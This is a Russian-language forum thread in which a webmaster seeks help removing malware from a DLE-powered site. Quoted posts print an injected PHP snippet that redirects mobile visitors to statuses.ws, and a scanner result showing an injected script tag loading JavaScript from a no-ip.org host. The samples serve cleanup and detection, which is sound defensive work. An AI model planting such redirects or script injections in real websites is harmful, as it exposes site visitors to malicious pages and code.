Имя пользователя:
Пароль:  
Помощь | Регистрация | Забыли пароль?  | Правила  

Компьютерный форум OSzone.net » Компьютеры + Интернет » Вебмастеру » Вирус на сайте, нужна помощь

Ответить
Настройки темы
Вирус на сайте, нужна помощь

Аватара для ][alter

Старожил


Сообщения: 195
Благодарности: 15

Профиль | Сайт | Отправить PM | Цитировать


Изменения
Автор: Sham
Дата: 06-09-2011
Добрый вечер. Сегодня после обеда заметил неприятную особенность на сайте. Постоянно ругается антивирус на разные адреса, так же видно что подвал сайта нарушен. Но тела вируса найти мне не удалось (( Помогите пожалуйста решить проблему, где найти тело вируса и как это лечится ? Сайт unechanews.ru

-------
Если хочешь научиться плавать, прыгай в воду. Находясь на суше, никакой умонастрой тебе не поможет.


Отправлено: 21:59, 05-09-2011

 

Ветеран


Сообщения: 3487
Благодарности: 507

Профиль | Сайт | Отправить PM | Цитировать


Цитата Gudzon2:
Оченнно сильно звинялись, как ни странно. »
Ты же обещал их засно...ть до потери пульса )))

-------
Просьба обращаться на "ты".


Отправлено: 16:27, 10-03-2013 | #21



Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети.

Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля.


Новый участник


Сообщения: 25
Благодарности: 0

Профиль | Отправить PM | Цитировать


Severny, Да не так уж конечно Теперь я ваще

Отправлено: 16:33, 10-03-2013 | #22


Новый участник


Сообщения: 25
Благодарности: 0

Профиль | Отправить PM | Цитировать


SOS!!!! SOS!!!!
Снова проблема с сайтом, но сейчас вообще тупиковая ситуация. Яша прислал письмо, что сайт заражен.

http://stdclub.name/2013/05/26/
zeroesassay.battingyw.in Troj/ExpJS-IE
Но это блин страница целая и где искать ентого чертового зловреда?
Проверкой на других онлайн сервисах, выдает что сайт чист как невинный ребенок. Что делать? Помогите пожалуйста.
PS нашел информацию что атака связана с statuses.ws
Проверил по рекомендациям файлы
Цитата:
Борьба с дырой:

Думаю ее нужно будет проводить регулярно, так как оффициальный фикс не очень помогает.

Делаем следующее:
1. Открываем engine/data/config.php и dbconfig.php
2. Ищем такой код:

$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");
if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');
}


3. Сносим к чертям собачьим.
4. Ищем engine/engine.php и там должно быть аж два подобных кода, кстати вставлены они у каждого в разные строчки, так что не буду называть точный номер. Сносим все это.
5. Ищем engine/init.php - там тоже все это убираем
6. В index.php такая штука тоже есть, тоже убираем.
Но указанного кода не нашел.
Люди добрые отзовитесь. Замучился уже откатывать сайт из бэкапов. Помогите справится с вирусом.
Проверил сегодня сайт на http://sitecheck.sucuri.net
Выдал результат неутешительный(((
Цитата:
Malware found in the URL:
http://stdclub.name


Known javascript malware.
Details:
http://sucuri.net/malware/malware-entry-mwjsanon7
<script src="http://vttcmgr.no-ip.org/showforum.php?pid=152" type="text/javascript"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



Malware found in the URL:
http://stdclub.name/404testpage4525d2fdc


Malware found in the URL:
http://stdclub.name/sitemap


Malware found in the URL:
http://stdclub.name/index.php?do=feedback


Malware found in the URL:
http://stdclub.name/index.php


Malware found in the URL:
http://stdclub.name/add_news.html


Malware found in the URL:
http://stdclub.name/soft/portable_vv07


Malware found in the URL:
http://stdclub.name/index.php?do=register


Malware found in the URL:
http://stdclub.name/katalog.html

Вот эта хрень Known javascript malware.
Details:
http://sucuri.net/malware/malware-entry-mwjsanon7
<script src="http://vttcmgr.no-ip.org/showforum.php?pid=152" type="text/javascript"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
На всех перечисленных страницах.

Последний раз редактировалось Gudzon2, 07-06-2013 в 16:57.


Отправлено: 10:15, 30-05-2013 | #23


Новый участник


Сообщения: 25
Благодарности: 0

Профиль | Отправить PM | Цитировать


Друзья, снова требуется помощь. На этот раз вообще ситуация патовая.
Стоит ограничение доступа к сайту на DLE по IP, но все равно кто то получает доступ. Вносит изменения в файлы сайта.
Как такое возможно?

Отправлено: 12:35, 30-08-2013 | #24



Компьютерный форум OSzone.net » Компьютеры + Интернет » Вебмастеру » Вирус на сайте, нужна помощь

Участник сейчас на форуме Участник сейчас на форуме Участник вне форума Участник вне форума Автор темы Автор темы Шапка темы Сообщение прикреплено

Похожие темы
Название темы Автор Информация о форуме Ответов Последнее сообщение
очень нужна ваша помощь. возможно ВИРУС kcenij Лечение систем от вредоносных программ 1 26-05-2010 13:28
Вирус Кидо. Срочно нужна помощь! комикс Лечение систем от вредоносных программ 13 31-01-2010 20:50
Наверно вирус или троян на сайте AACC Лечение систем от вредоносных программ 6 23-09-2009 13:45
[решено] Вирус на сайте. (с) Касперский Artem-Samsung Вебмастеру 8 27-02-2009 23:02
Вирус Нужна помщь region Лечение систем от вредоносных программ 1 29-02-2008 10:13




 
Переход